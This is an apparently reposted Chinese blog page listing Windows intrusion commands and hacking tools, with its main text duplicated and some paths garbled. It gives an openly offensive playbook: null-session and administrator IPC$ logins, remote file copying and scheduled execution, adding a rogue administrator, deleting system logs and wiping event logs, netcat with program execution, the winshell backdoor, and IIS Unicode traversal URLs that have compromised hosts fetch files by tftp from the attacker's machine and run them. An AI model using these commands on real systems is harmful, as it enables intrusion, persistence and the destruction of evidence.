网管和***都必须知道的命令
生活随笔
收集整理的這篇文章主要介紹了
网管和***都必须知道的命令
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
與遠程主機建立空管連接 net use \IP地址ipc$ "" /use:""
以管理員身份登錄遠程主機 net use \IP地址ipc$ "密碼" /use:"Administrator"
傳送文件到遠程主機WINNT目錄下copy 本機目錄路徑程序 \IP地址admin$
查看遠程主機時間 net time \IP地址
定時啟動某個程序 at \IP地址 02:18 readme.exe
查看共享 net view \IP地址
查看netbios工作組列表 nBTstat -A IP地址
將遠程主機C盤映射為自己的F盤 net use f: \IP地址c$ ""/user:"Administrator"
這兩條把自己增加到管理員組: net user 用戶名 密碼 /add
net locaLGroup Administrators 用戶名 /add
斷開連接 net use \IP地址ipc$ /delete
掃尾:
del C:winntsystem32logfiles*.*
del C:winntssytem32config*.evt
del C:winntsystem32dTCLog*.*
del C:winntsystem32*.log
del C:winntsystem32*.txt
del C:winnt*.txt
del C:winnt*.log
一、netsvc.exe
下面的命令分別是列出主機上的服務項目、查尋和遠程啟動主機的“時間任務”服務:
netsvc /list \IP地址
netsvc schedule \IP地址 /query
netsvc \IP地址 schedule /start
二、OpenTelnet.exe
遠程啟動主機的Telnet服務,并綁定端口到7878,例如:
OpenTelnet \IP地址 用戶名 密碼 1 7878
然后就可以telnet到主機的7878端口,進入DOS方式下:
telnet IP地址 7878
三、winshell.exe
一個非常小的***(不到6K),telnet到主機的7878端口,輸入密碼winshell,當看到CMD>后,可打下面的命令:
p Path (查看winshell主程序的路徑信息)
b reBoot (重新啟動機器)
d shutDown (關(guān)閉機器)
s Shell (執(zhí)行后你就會看到可愛的“C:>”)
x eXit (退出本次登錄會話,此命令并不終止winshell的運行)
CMD> [url]http://.../srv.exe[/url] (通過http下載其他網(wǎng)站上的文件到運行winshell的機器上)
四、3389登陸器,GUI方式登錄遠程主機的
五、elsave.exe
事件日志清除工具
elsave -s \IP地址 -l "application" -C
elsave -s \IP地址 -l "system" -C
elsave -s \IP地址 -l "security" -C
執(zhí)行后成功清除應用程序日志,系統(tǒng)日志,安全日志
六、hbulot.exe
開啟win2kserver和winxp的3389服務
hbulot (/r)
七、nc.exe(netcat.exe)
一個很好的工具,一些腳本程序都要用到它,也可做溢出后的連接用。
想要連接到某處: nc (-options) hostname port(s)(ports) ...
綁定端口等待連接: nc -l -p port (-options) (hostname) (port)
參數(shù):
-e prog 程序重定向,一旦連接,就執(zhí)行 (危險!)
-g gateway source-routing hop point(s), up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 幫助信息
-i secs 延時的間隔
-l 監(jiān)聽模式,用于入站連接
-n 指定數(shù)字的IP地址,不能用hostname
-o file 記錄16進制的傳輸
-p port 本地端口號
-r 任意指定本地及遠程端口
-s addr 本地源地址
-u UDP模式
-v 詳細輸出——用兩個-v可得到更詳細的內(nèi)容
-w secs timeout的時間
-z 將輸入輸出關(guān)掉——用于掃描時
八、TFTPD32.EXE
把自己的電腦臨時變?yōu)橐慌_FTP服務器,讓肉雞來下載文件,tftp命令要在肉雞上執(zhí)行,通常要利用Unicode漏洞或telnet到肉雞,例如:
[url]http://IP[/url]地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本機IP地址 get 文件名 c:winntsystem32文件名
然后可以直接令文件運行:
[url]http://IP[/url]地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
九、prihack.exe是IIS的printer遠程緩沖區(qū)溢出工具
idqover.exe是溢出idq的,選擇“溢出后在一個端口監(jiān)聽”,然后用telnet連接它的監(jiān)聽端口,如果溢出成功,一連它的端口,綁定的命令馬上執(zhí)行。xploit.exe是一個圖形界面的ida溢出,成功以后winxp下需要打winxp。
一○、ntis.exe、cmd.exe和cmdasp.asp是三個cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有ASP執(zhí)行權(quán)限的目錄。然后用IE瀏覽器連接.
?from:[url]http://360.qihoo.com/3456111/b_adz_4_1580284.html[/url]
以管理員身份登錄遠程主機 net use \IP地址ipc$ "密碼" /use:"Administrator"
傳送文件到遠程主機WINNT目錄下copy 本機目錄路徑程序 \IP地址admin$
查看遠程主機時間 net time \IP地址
定時啟動某個程序 at \IP地址 02:18 readme.exe
查看共享 net view \IP地址
查看netbios工作組列表 nBTstat -A IP地址
將遠程主機C盤映射為自己的F盤 net use f: \IP地址c$ ""/user:"Administrator"
這兩條把自己增加到管理員組: net user 用戶名 密碼 /add
net locaLGroup Administrators 用戶名 /add
斷開連接 net use \IP地址ipc$ /delete
掃尾:
del C:winntsystem32logfiles*.*
del C:winntssytem32config*.evt
del C:winntsystem32dTCLog*.*
del C:winntsystem32*.log
del C:winntsystem32*.txt
del C:winnt*.txt
del C:winnt*.log
一、netsvc.exe
下面的命令分別是列出主機上的服務項目、查尋和遠程啟動主機的“時間任務”服務:
netsvc /list \IP地址
netsvc schedule \IP地址 /query
netsvc \IP地址 schedule /start
二、OpenTelnet.exe
遠程啟動主機的Telnet服務,并綁定端口到7878,例如:
OpenTelnet \IP地址 用戶名 密碼 1 7878
然后就可以telnet到主機的7878端口,進入DOS方式下:
telnet IP地址 7878
三、winshell.exe
一個非常小的***(不到6K),telnet到主機的7878端口,輸入密碼winshell,當看到CMD>后,可打下面的命令:
p Path (查看winshell主程序的路徑信息)
b reBoot (重新啟動機器)
d shutDown (關(guān)閉機器)
s Shell (執(zhí)行后你就會看到可愛的“C:>”)
x eXit (退出本次登錄會話,此命令并不終止winshell的運行)
CMD> [url]http://.../srv.exe[/url] (通過http下載其他網(wǎng)站上的文件到運行winshell的機器上)
四、3389登陸器,GUI方式登錄遠程主機的
五、elsave.exe
事件日志清除工具
elsave -s \IP地址 -l "application" -C
elsave -s \IP地址 -l "system" -C
elsave -s \IP地址 -l "security" -C
執(zhí)行后成功清除應用程序日志,系統(tǒng)日志,安全日志
六、hbulot.exe
開啟win2kserver和winxp的3389服務
hbulot (/r)
七、nc.exe(netcat.exe)
一個很好的工具,一些腳本程序都要用到它,也可做溢出后的連接用。
想要連接到某處: nc (-options) hostname port(s)(ports) ...
綁定端口等待連接: nc -l -p port (-options) (hostname) (port)
參數(shù):
-e prog 程序重定向,一旦連接,就執(zhí)行 (危險!)
-g gateway source-routing hop point(s), up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 幫助信息
-i secs 延時的間隔
-l 監(jiān)聽模式,用于入站連接
-n 指定數(shù)字的IP地址,不能用hostname
-o file 記錄16進制的傳輸
-p port 本地端口號
-r 任意指定本地及遠程端口
-s addr 本地源地址
-u UDP模式
-v 詳細輸出——用兩個-v可得到更詳細的內(nèi)容
-w secs timeout的時間
-z 將輸入輸出關(guān)掉——用于掃描時
八、TFTPD32.EXE
把自己的電腦臨時變?yōu)橐慌_FTP服務器,讓肉雞來下載文件,tftp命令要在肉雞上執(zhí)行,通常要利用Unicode漏洞或telnet到肉雞,例如:
[url]http://IP[/url]地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本機IP地址 get 文件名 c:winntsystem32文件名
然后可以直接令文件運行:
[url]http://IP[/url]地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
九、prihack.exe是IIS的printer遠程緩沖區(qū)溢出工具
idqover.exe是溢出idq的,選擇“溢出后在一個端口監(jiān)聽”,然后用telnet連接它的監(jiān)聽端口,如果溢出成功,一連它的端口,綁定的命令馬上執(zhí)行。xploit.exe是一個圖形界面的ida溢出,成功以后winxp下需要打winxp。
一○、ntis.exe、cmd.exe和cmdasp.asp是三個cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有ASP執(zhí)行權(quán)限的目錄。然后用IE瀏覽器連接.
?from:[url]http://360.qihoo.com/3456111/b_adz_4_1580284.html[/url]
轉(zhuǎn)載于:https://blog.51cto.com/aarden/56173
總結(jié)
以上是生活随笔為你收集整理的网管和***都必须知道的命令的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Joke若干则
- 下一篇: 在“手拉手、献爱心”活动中,四年级捐款2